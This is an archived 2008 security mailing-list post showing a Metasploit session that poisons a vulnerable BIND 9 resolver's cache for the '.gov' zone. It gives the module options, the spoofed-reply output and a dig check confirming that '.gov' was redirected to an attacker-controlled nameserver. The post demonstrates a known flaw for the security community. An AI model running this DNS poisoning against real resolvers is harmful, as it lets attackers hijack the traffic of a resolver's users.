Dailydave mailing list archives
Re: DNS and other fun.
From: H D Moore <dailydave () digitaloffense net>
Date: Tue, 29 Jul 2008 16:59:00 -0500
Below is an example of poisoning ".gov" on a vulnerable BIND 9 instance. This took about two minutes, no crazy fast packet generation required. msf > use auxiliary/spoof/dns/bailiwicked_domain msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D RHOST => A.B.C.D msf auxiliary(bailiwicked_domain) > set DOMAIN gov DOMAIN => net msf auxiliary(bailiwicked_domain) > set SRCPORT 0 SRCPORT => 0 msf auxiliary(bailiwicked_domain) > set NEWDNS msfdns.ath.cx NEWDNS => msfdns.ath.cx msf auxiliary(bailiwicked_domain) > run [*] Switching to target port 48178 based on Metasploit service [*] Warning: target address A.B.C.D is not the same as the nameserver's query source address 72.48.121.197! [*] Targeting nameserver A.B.C.D for injection of gov. nameservers as msfdns.ath.cx [*] Querying recon nameserver for gov.'s nameservers... [*] Got an NS record: gov. 172717 IN NS F.GOV.ZONEEDIT.COM. [*] Querying recon nameserver for address of F.GOV.ZONEEDIT.COM.... [*] Got an A record: F.GOV.ZONEEDIT.COM. 172717 IN A 66.197.185.229 [*] Checking Authoritativeness: Querying 66.197.185.229 for gov.... [*] F.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as [*] Got an NS record: gov. 172717 IN NS G.GOV.ZONEEDIT.COM. [*] Querying recon nameserver for address of G.GOV.ZONEEDIT.COM.... [*] Got an A record: G.GOV.ZONEEDIT.COM. 172717 IN A 66.135.32.100 [*] Checking Authoritativeness: Querying 66.135.32.100 for gov.... [*] G.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as [*] Got an NS record: gov. 172717 IN NS C.GOV.ZONEEDIT.COM. [*] Querying recon nameserver for address of C.GOV.ZONEEDIT.COM.... [*] Got an A record: C.GOV.ZONEEDIT.COM. 172716 IN A 69.72.142.35 [*] Checking Authoritativeness: Querying 69.72.142.35 for gov.... [*] C.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as [*] Got an NS record: gov. 172717 IN NS E.GOV.ZONEEDIT.COM. [*] Querying recon nameserver for address of E.GOV.ZONEEDIT.COM.... [*] Got an A record: E.GOV.ZONEEDIT.COM. 172716 IN A 82.165.40.134 [*] Checking Authoritativeness: Querying 82.165.40.134 for gov.... [*] E.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as [*] Got an NS record: gov. 172717 IN NS D.GOV.ZONEEDIT.COM. [*] Querying recon nameserver for address of D.GOV.ZONEEDIT.COM.... [*] Got an A record: D.GOV.ZONEEDIT.COM. 172716 IN A 209.97.207.48 [*] Checking Authoritativeness: Querying 209.97.207.48 for gov.... [*] D.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as [*] Got an NS record: gov. 172717 IN NS A.GOV.ZONEEDIT.COM. [*] Querying recon nameserver for address of A.GOV.ZONEEDIT.COM.... [*] Got an A record: A.GOV.ZONEEDIT.COM. 172716 IN A 216.55.155.29 [*] Checking Authoritativeness: Querying 216.55.155.29 for gov.... [*] A.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as [*] Got an NS record: gov. 172717 IN NS B.GOV.ZONEEDIT.COM. [*] Querying recon nameserver for address of B.GOV.ZONEEDIT.COM.... [*] Got an A record: B.GOV.ZONEEDIT.COM. 172715 IN A 206.51.224.229 [*] Checking Authoritativeness: Querying 206.51.224.229 for gov.... [*] B.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as [*] Calculating the number of spoofed replies to send per query... [*] race calc: 100 queries | min/max/avg time: 0.01/0.19/0.04 | min/max/avg replies: 2/118/24 [*] Sending 5 spoofed replies from each nameserver (7) for each query [*] Attempting to inject poison records for gov.'s nameservers into A.B.C.D:48178... [*] Sent 1000 queries and 35000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.11/0.03 | min/max/avg replies: 8/54/22 [*] Now sending 4 spoofed replies from each nameserver (7) for each query [*] Sent 2000 queries and 63000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.1/0.02 | min/max/avg replies: 3/35/16 [*] Now sending 3 spoofed replies from each nameserver (7) for each query [*] Sent 3000 queries and 84000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.14/0.03 | min/max/avg replies: 3/72/21 [*] Now sending 4 spoofed replies from each nameserver (7) for each query [*] Sent 4000 queries and 112000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.02/0.08/0.03 | min/max/avg replies: 8/40/28 [*] Now sending 6 spoofed replies from each nameserver (7) for each query [*] Poisoning successful after 4000 queries and 112000 responses: gov. == msfdns.ath.cx [*] Auxiliary module execution completed msf auxiliary(bailiwicked_domain) > dig -t a poisoning_tlds_is_fun_and_fast.gov @A.B.C.D [*] exec: dig -t a poisoning_tlds_is_fun_and_fast.gov @A.B.C.D ; <<>> DiG 9.3.2 <<>> -t a poisoning_tlds_is_fun_and_fast.gov @A.B.C.D ; (1 server found) ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5757 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1 ;; QUESTION SECTION: ;poisoning_tlds_is_fun_and_fast.gov. IN A ;; ANSWER SECTION: poisoning_tlds_is_fun_and_fast.gov. 60 IN A 1.3.3.7 ;; AUTHORITY SECTION: gov. 41938 IN NS msfdns.ath.cx. ;; ADDITIONAL SECTION: msfdns.ath.cx. 3 IN A 71.41.138.124 ;; Query time: 23 msec ;; SERVER: A.B.C.D#53(A.B.C.D) ;; WHEN: Tue Jul 29 16:55:08 2008 ;; MSG SIZE rcvd: 111 poisoning_tlds_is_fun_and_fast.gov = 1.3.3.7 _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- DNS and other fun. Dave Aitel (Jul 29)
- Re: DNS and other fun. H D Moore (Jul 29)
- Message not available
- Re: DNS and other fun. H D Moore (Jul 29)
- Re: DNS and other fun. marc_bevand (Jul 29)